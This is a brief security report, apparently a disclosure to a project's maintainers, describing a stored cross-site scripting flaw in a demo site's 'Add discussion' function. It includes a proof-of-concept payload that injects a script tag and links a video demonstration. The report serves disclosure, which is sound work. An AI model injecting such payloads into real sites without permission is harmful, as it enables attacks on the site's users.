I tested the demo site you provided and I see that there is a stored XSS in function Add discussion
payload: thanh"><script>alert(1)</script>
video PoC: https://drive.google.com/file/d/1nsybTloKxd45a716hVFNOyxTrW4fbkry/view?usp=sharing